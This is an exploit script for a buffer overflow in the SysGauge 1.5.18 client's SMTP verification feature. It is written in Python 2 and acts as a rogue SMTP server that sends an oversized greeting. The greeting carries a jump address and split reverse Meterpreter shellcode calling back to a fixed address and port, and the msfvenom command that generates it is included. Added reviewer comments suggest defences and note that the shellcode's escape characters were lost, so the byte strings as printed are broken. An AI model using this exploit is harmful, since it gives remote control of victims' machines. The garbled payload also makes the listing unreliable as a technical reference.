SysGauge 1.5.18 - Buffer Overflow
# Exploit Title: SysGauge 1.5.18 – buffer overflow in SMTP connection verification function leads to code execution
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe
# Version: 1.5.18
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : requested
#
# Reviewer note (defender's reading of this listing): the vulnerable party is the
# SysGauge *client*.  Its SMTP connection verification feature connects out to
# whatever SMTP host is configured, and this script plays that host: it accepts
# the connection and answers with a several-hundred-byte "220" greeting instead
# of a normal one; the title attributes the overflow to the client's handling of
# that reply.  For operators this means the product's SMTP host/port settings are
# effectively untrusted input: keep them pointed at a mail server you control,
# restrict outbound port-25 traffic from monitoring hosts to that server, alert on
# SMTP 220 greetings that are abnormally long or contain non-printable bytes, and
# apply the vendor's fix for this version if one is available.
#
# The shellcode has to be split into 2 pieces for the exploit to work and has to be placed at the offsets like shown below.
# The 1st part can be max. 236 bytes
# The 2nd part can be max. 76 (leave at least 4 NOPs)
import socket

# NOTE(review): throughout this listing the backslashes of the "\x.." escape
# sequences appear to have been lost in extraction; as printed, these literals
# are plain ASCII text rather than the byte values the surrounding comments
# describe.  They are reproduced here unchanged.

# QtGui4.dll 0x6527635E - CALL ESP
jmp = "x5ex63x27x65"
nops = "x90"*8

# reverse meterpreter shell 306 bytes long bad chars x00x0ax0bx20
#IP: 192.168.198.128, PORT: 4444
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b x00x0ax0dx20 --smallest
rev_met_1=("x6ax47x59xd9xeexd9x74x24xf4x5bx81x73x13x1fx2d"
"x97x97x83xebxfcxe2xf4xe3xc5x15x97x1fx2dxf7x1e"
"xfax1cx57xf3x94x7dxa7x1cx4dx21x1cxc5x0bxa6xe5"
"xbfx10x9axddxb1x2exd2x3bxabx7ex51x95xbbx3fxec"
"x58x9ax1exeax75x65x4dx7ax1cxc5x0fxa6xddxabx94"
"x61x86xefxfcx65x96x46x4exa6xcexb7x1exfex1cxde"
"x07xcexadxdex94x19x1cx96xc9x1cx68x3bxdexe2x9a"
"x96xd8x15x77xe2xe9x2exeax6fx24x50xb3xe2xfbx75"
"x1cxcfx3bx2cx44xf1x94x21xdcx1cx47x31x96x44x94"
"x29x1cx96xcfxa4xd3xb3x3bx76xccxf6x46x77xc6x68"
"xffx72xc8xcdx94x3fx7cx1ax42x45xa4xa5x1fx2dxff"
"xe0x6cx1fxc8xc3x77x61xe0xb1x18xd2x42x2fx8fx2c"
"x97x97x36xe9xc3xc7x77x04x17xfcx1fxd2x42xfdx1a"
"x45x57x3fxd9xadxffx95x1fx3cxcbx1exf9x7dxc7xc7"
"x4fx6dxc7xd7x4fx45x7dx98xc0xcdx68x42x88x47x87"
"xc1x48x45x0ex32x6bx4c")
rev_met_2=("x68x42x9axedxe3x9bxe0x63"
"x9fxe2xf3x45x67x22xbdx7bx68x42x75x2dxfdx93x49"
"x7axffx95xc6xe5xc8x68xcaxa6xa1xfdx5fx45x97x87"
"x1fx2dxc1xfdx1fx45xcfx33x4cxc8x68x42x8cx7exfd"
"x97x49x7exc0xffx1dxf4x5fxc8xe0xf8x96x54x36xeb"
"xe2x79xdcx2dx97x97")

# Overlong greeting payload, assembled in the layout the header comments describe.
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1

port = 25
s = socket.socket()
ip = '0.0.0.0'  # listens on every interface
s.bind((ip, port))
s.listen(5)
# Python 2 print statement below: the script does not run unmodified on Python 3.
print 'Listening on SMTP port: '+str(port)
print(len(rev_met_1))
print(len(rev_met_2))
# Answer every connecting client with the oversized 220 greeting, then drop the
# connection; the loop never terminates on its own.
while True:
    conn, addr = s.accept()
    conn.send('220 '+buffer+'ESMTP Sendmail ')
    conn.close()